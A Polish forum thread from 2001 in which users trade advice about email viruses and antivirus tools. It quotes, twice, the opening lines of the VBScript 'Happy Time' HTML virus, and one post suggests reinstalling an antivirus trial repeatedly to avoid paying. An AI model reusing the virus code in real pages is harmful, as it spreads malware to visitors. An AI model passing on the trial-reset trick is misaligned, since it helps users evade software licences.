Gość: Mosze IP: *.inter.net.il 23.08.01, 21:33 Dzis dostalem duzo wirusow, ale jak widzicie jestem jeszcze na "Mapie" chce tylko przypomniec, ze kto ich wysyla to grozi kara wiezienia co najmniej... Odpowiedz Link Zgłoś Obserwuj wątek Podgląd Opublikuj
Gość: jajacek Re: Wirusy....i Bakterje IP: *.kabel.telenet.be 23.08.01, 22:34 A to pij ziola! Jak dostales te wirusy? Radze wejsc na strone www.poland.com,tam w serwisie"download"chyba w dziale "dodatki"jest malutki programik "ProPort"zciagnij go sobie . Zawsze bedziesz wiedzial czy masz nieproszonych gosci w komputerze! Odpowiedz Link Zgłoś
Gość: Stoik Re: Wirusy.... IP: 10.0.207.* / 212.191.188.* 23.08.01, 23:00 Drogi Mosze, to jakaś epidemia, dziś doszło do mnie 15 listów z wirusami. Ale nie myśl sobie, że tyle jest złośliwych ludzi na świecie. Jak otworzysz załącznik z takim wirusem, to on zaraz rozsyła listy z sobą samym do wszystkich, którzy są w Twojej książce adresowej! Polecam jakiś dobry program antywirusowy, np. Norton Antyvirus, który sprawdza listy w trakcie ich przychodzenia. Serdecznie pozdrawiam i życzę szybkiego ozdrowienia (komputera). Odpowiedz Link Zgłoś
Gość: Mosze Re: Wirusy.... IP: *.inter.net.il 23.08.01, 23:28 Dziekuje, ja nie otwozylem, kilka bylo pisane po "Chinsku" ale wedlug adresu to wiem skad one przychodza... Odpowiedz Link Zgłoś
Gość: Scan Re: Wirusy.... IP: *.home.net.pl 24.08.01, 03:24 Mosze drogi, Norton antyvirus dobry na zachodnie wirusy, a one lagodne. Na wszelka france najlepszy polski mks.vir. - www.mksvir.com. Nie kijem, to palka wygna. I darmo. Pozdrawiam Scan Odpowiedz Link Zgłoś
Gość: SCAN Re: Wirusy.... IP: *.home.net.pl 24.08.01, 03:45 Poprawka, Mosze: mks.com.pl. versja traialowa 30 dni. Ale po 30 dniach zainstaluj od nowa i tak na okrąglo. Koniecznie zachowaj instalke. Nie ujrzy Marek Sell ani szekla!!!! Pozdrawiam Scan Gość portalu: Scan napisał(a): > Mosze drogi, Norton antyvirus dobry na zachodnie wirusy, a one lagodne. Na > wszelka france najlepszy polski mks.vir. - www.mksvir.com. Nie kijem, to palka > wygna. > I darmo. > Pozdrawiam > Scan Odpowiedz Link Zgłoś
Gość: Mosze Czy widze dobrze...?? IP: *.inter.net.il 24.08.01, 15:50 Panie Scan ta godzina to prawdziwa... U nas sie mowi nie pyta sie mezczyzny co robi po nocy .... ale ?? Pzdr, Mosze Odpowiedz Link Zgłoś
Gość: scan Re: Czy widze dobrze...?? IP: *.home.net.pl 24.08.01, 19:49 Mosze, ja czuwam. Dniami i nocami.Zebys mogl spac spokojnie. Pozdrowienia Scan Odpowiedz Link Zgłoś
Gość: maurycy Re: Wirusy.... IP: *.jeleniag.sdi.tpnet.pl 24.08.01, 08:18 Drogi Mosze, Niewiele można zrobić, poza wyrzuceniem zawirusowanego postu. Często wysyłający posty, nie wiedzą, że wysyłają wirusy typu robak. Co do porogramów antywirusowych, to polecam stronę: http://www.wirusy.pl/wirusy.php/index0.php na której masz do wyboru kilka programów antywirusowych, z których polecam AVP Eugene Kasperky Pro. Jest on wiele lepszy od McAfee, czy też Norton Ativirus. Pozdrowienia, Maurycy Odpowiedz Link Zgłoś
sceptyk Re: Wirusy.... 24.08.01, 10:17 Zasada numer 1 emailu: jesli dostajesz list z attachment z nieznanego adresu - NIE OTWIERASZ! Prosto do smieci. Chocby nawet w tytule bylo, ze ktos Cie kocha, albo ze masz szanse wygrac 1 000 000. pzdr sc-k Odpowiedz Link Zgłoś
Gość: Hiacynt Re: Wirusy.... Pozdrawiam wszystkich wirusologów IP: *.klodzko.sdi.tpnet.pl 24.08.01, 10:52 sceptyk napisał(a): > Zasada numer 1 emailu: jesli dostajesz list z attachment z nieznanego adresu - > NIE OTWIERASZ! Prosto do smieci. Chocby nawet w tytule bylo, ze ktos Cie kocha, > > albo ze masz szanse wygrac 1 000 000. > > pzdr > sc-k A co zrobić jak w tytule stoi: Nie otworzysz to umrzesz. ??? Pozdrawiam wszystkich wirusologów Odpowiedz Link Zgłoś
Gość: Lechu Uwaga na strony HTML IP: 10.129.226.* / *.acn.pl 24.08.01, 10:38 Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''a i mks go wykrywał. Ten wirus był wredny: zarażał moje html''e, exe''ki i dll''e. Po czym kasował pliki. W html''u to był kawałek programu (znakowo-VBscript). Problem w tym, że strony html standardowo zawierają programy (procedury) w VBscripcie, javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te akcje wyłapuje program antywirusowy. Odpowiedz Link Zgłoś
Gość: Indris HTML ??? IP: *.ibspan.waw.pl 24.08.01, 13:00 Gość portalu: Lechu napisał(a): > Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem > jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''''a i mks go > > wykrywał. Ten wirus był wredny: zarażał moje html''''e, exe''''ki i dll''''e. Po czym > > kasował pliki. W html''''u to był kawałek programu (znakowo-VBscript). Problem w > tym, że strony html standardowo zawierają programy (procedury) w VBscripcie, > javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale > niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te > akcje wyłapuje program antywirusowy. Proponuję Ci, żebyś przesłał tę informację do producenta VBscriptu, może CI nawet coś odpalą, a oprócz tego pokazał ten kawałek kodu. Jeszcze bardziej dotyczy to Javy. Producent Javy już jakiś czas temu zwracał się do wszystkich użytkowników z prośbą o łamanie zabezpieczeń i powiadamianie jak się uda. Nie znam VBscriptu, ale domyślam się, że ma wpisany zakaz odnoszenia się do plików na komputerze klienta, Java ma to na pewno. Gdyby wstawki VBs mogły robić takie rzeczy jak piszesz, to chyba już by było o tym głośno ? Ale może to jakiś wirusowy geniusz wpadł na to o czym nikt wcześniej nie pomyślał ? Albo więc jest to jakaś Twoja pomyłka albo bomba sezonu. Podaj szczegóły ! Od niedzieli będę na urlopie przez ok miesiąca ale z dużym zaciekawieniem przeczytam po powrocie. Odpowiedz Link Zgłoś
Gość: Lechu Oto początek kodu virusa z HTML (happy time) IP: 10.129.226.* / *.acn.pl 24.08.01, 14:34 Pierwsza reakcja mks-a była na pliku tymczasowym help.htm. Cały poniższy kod został dołączony na końcu, za znacznikiem </html>. Niewykluczone że sam script nie odnosi się do plików, lecz ściąga jakiś inny plik, który to robi. Takie zdarzenie miałem po raz pierwszy od kilku lat surfowania. Sądzę więc (na szczęście), że nie jest to powszechny sposób infekowania. Ale umieszczanie bomb zegarowych może długi czas zostać niewykryte, aż do czasu zero. Początek kodu: <script language=''VBScript''> Rem I am sorry! happy time On Error Resume Next mload Sub mload() On Error Resume Next mPath = Grf() Set Os = CreateObject("Scriptlet.TypeLib") Set Oh = CreateObject("Shell.Application") If IsHTML Then mURL = LCase(document.Location) If mPath = "" Then Os.Reset Os.Path = "C:\Help.htm" Os.Doc = Lhtml() Os.Write() Odpowiedz Link Zgłoś
Gość: Lechu Oto początek kodu virusa z HTML (happy time) IP: 10.129.226.* / *.acn.pl 24.08.01, 14:35 Pierwsza reakcja mks-a była na pliku tymczasowym help.htm. Cały poniższy kod został dołączony na końcu, za znacznikiem </html>. Niewykluczone że sam script nie odnosi się do plików, lecz ściąga jakiś inny plik, który to robi. Takie zdarzenie miałem po raz pierwszy od kilku lat surfowania. Sądzę więc (na szczęście), że nie jest to powszechny sposób infekowania. Ale umieszczanie bomb zegarowych może długi czas zostać niewykryte, aż do czasu zero. Początek kodu: <script language=''VBScript''> Rem I am sorry! happy time On Error Resume Next mload Sub mload() On Error Resume Next mPath = Grf() Set Os = CreateObject("Scriptlet.TypeLib") Set Oh = CreateObject("Shell.Application") If IsHTML Then mURL = LCase(document.Location) If mPath = "" Then Os.Reset Os.Path = "C:\Help.htm" Os.Doc = Lhtml() Os.Write() Odpowiedz Link Zgłoś
Gość: pollak Re: Uwaga na strony HTML IP: *.jgora.dialog.net.pl 24.08.01, 13:04 Gość portalu: Lechu napisał(a): > Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem > jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''''a i mks go > > wykrywał. Ten wirus był wredny: zarażał moje html''''e, exe''''ki i dll''''e. Po czym > > kasował pliki. W html''''u to był kawałek programu (znakowo-VBscript). Problem w > tym, że strony html standardowo zawierają programy (procedury) w VBscripcie, > javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale > niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te > akcje wyłapuje program antywirusowy. exe-ki, dll-e ... panowie rzucmy te Windowsy, bo sie rozchorujemy. Odpowiedz Link Zgłoś
Gość: Indris Podziękowanie i jedna uwaga IP: *.ibspan.waw.pl 24.08.01, 19:30 Dziękuję za kod, jeszcze go zdążyłem odczytać. Mam jedno spostrzeżenie: VBscript jest akceptowany przez Internet Explorera, ale ignorowany przez Netscape (przynajmniej do wersji 4.75). O innych przeglądarkach nie wiem nic ''w tym temacie''. Dlatego m/in nie zapoznałem się dotąd z VBscriptem, bo staram się tworzyć strony akceptowane przez obie przeglądarki. Wynikałoby z tego, że Netscape jest przeglądarką bezpieczniejszą, bo jedyne aktywne wstawki przy NS to wstawki JavaScript i aplety Javy. Wirusa w JavaScript sobie nie wyobrażam (ale może to niedostatek wyobraźni). O wirusie w Javie, też nie słyszałem, ale widziałem przykład apletu zatykającego komputer. Idea była prosta: aplet tworzył nowy wątek, który tworzył nowy wątek, który... To się nie replikowało, więc nie było klasycznym wirusem, ale wnerwiać potrafiło. Odpowiedz Link Zgłoś
Gość: M. Zalaczniki IP: *.warszawa.cvx.ppp.tpnet.pl 24.08.01, 13:15 Wirusy, jak dobre potrafia nas zaskoczyc. Ja mialam mialam malo zabawna historie. Dostalam mail od bardzo szacownego pana na wysokim stanowisku, z ktorym prowadzilam sluzbowa korespondencje: tytul byl: I love you. Pomyslalam, ze oszalal albo, ze ja wyslalam mu cos niewlasciwego przez pomylke, albo czyms mu sie przysluzylam. Bylam pierwsza w biurze. Po chwili przyszli koledzy i zaczeli tez mi odsylac milosne zwierzenia. A dobrze juz wtedy wiedzialam, ze nieznanych zalacznikow otwierac nie mozna. ZAnim wyjasniono, ze to ogolnoswiatowa zaraza, administrator doszedl, ze to ja pierwsza rozsylac je po firmie zaczelam - a firma w calej Europie - i bardzo sie cieszyl palcem na mnie wskazujac. Pamietacie tego wirusa, prawda? Odpowiedz Link Zgłoś
Gość: Venom Re: Zalaczniki IP: 192.168.14.* / 192.168.14.* / *.121.135.226.host.de.colt.net 24.08.01, 13:41 Moral jest taki: nigdy nie przychodz jako pierwsza do pracy A poza tym wspolczuje. Ten wirus wywolal histerie i zaliczenie w poczet jego rozmnazaczy nie moglo byc przyjemne. Odpowiedz Link Zgłoś
Gość: maurycy Re: Zalaczniki IP: *.jeleniag.sdi.tpnet.pl 24.08.01, 13:42 Ja dostałem I Love You od bardzo miłej pani z którą wspołpracuję od lat. )) Odpowiedz Link Zgłoś
Gość: francek Wirusy?....instalujcie wigwamy!!!!!!!! IP: *.pppool.de 24.08.01, 13:34 Pan Pollak ma racje!!! w tym miejscu powiedziec moge tylko: "Linux is like a wigwam: no windows, no gates, apache inside !" Odpowiedz Link Zgłoś
Gość: witek Re: Wirusy?....instalujcie wigwamy!!!!!!!!________albo Igloo IP: *.chello.pl 24.08.01, 18:37 Przepraszam, że się odzywam bo niczego istotnego nie umiem dodać.Nie mogę się jednak oprzeć pokusie żeby się nie odezwać. Czytam Was na bieżąco i co raz bardziej mam otwarte usta z podziwu z jakimi to ja kompetentnymi ludżmi wirtualnie obcuję. Oczywiście wszystko sobie zanotowałem. Dziękuję, pozdrawiam Mosze i naszych przyjaznych EKSPERTÓW Witek Odpowiedz Link Zgłoś
Gość: jajacek Re: Dziki SCAN :))) IP: *.kabel.telenet.be 24.08.01, 19:27 Dziki,ze napisales link do tego programu . Do godz.17 korzystalem z PC Cillin2000 powodowal cigle konflikty przy starcie systemu. Wgralem ten polski program i przetestowalem go ,wpuscilem mu kontrolnie trzy wirusy. Rozpoznal je bezblednie! Cudze chwalicie swojego nie znacie!!!!!!!!!!!!!!!!! PS. Przy wszystkich zaletach zajmoje tylko 3.8MB!!!!!!!!!! Odpowiedz Link Zgłoś
Gość: Jajacek Re: Dziki SCAN :))) ---- oczywiscie DZIEKI SCAN IP: *.kabel.telenet.be 24.08.01, 19:36 Kawalek z ciasta ,ktore jadlem przy pisaniu poprzedniego postu blokowal skutecznie klawisz z literka "E" co zobaczylem za pozno.)))) Odpowiedz Link Zgłoś
Gość: Tytus Re: Pseudo wirusy Wirusy sa twoim straznikiem IP: *.ti.telenor.net 24.08.01, 19:35 Mam taki zwyczaj : jak od kogos nie chce dostawac wiecej postow to wysylam E- post z emnne : I love you . Oczywiscie wysylam post bez wirusa bo takiego nie posiadam i jeszcze podobnego problemu nie mialem . W kazdym razie namierzony klijent jest z glowy . Polecam sprawdzone ! Tytus Odpowiedz Link Zgłoś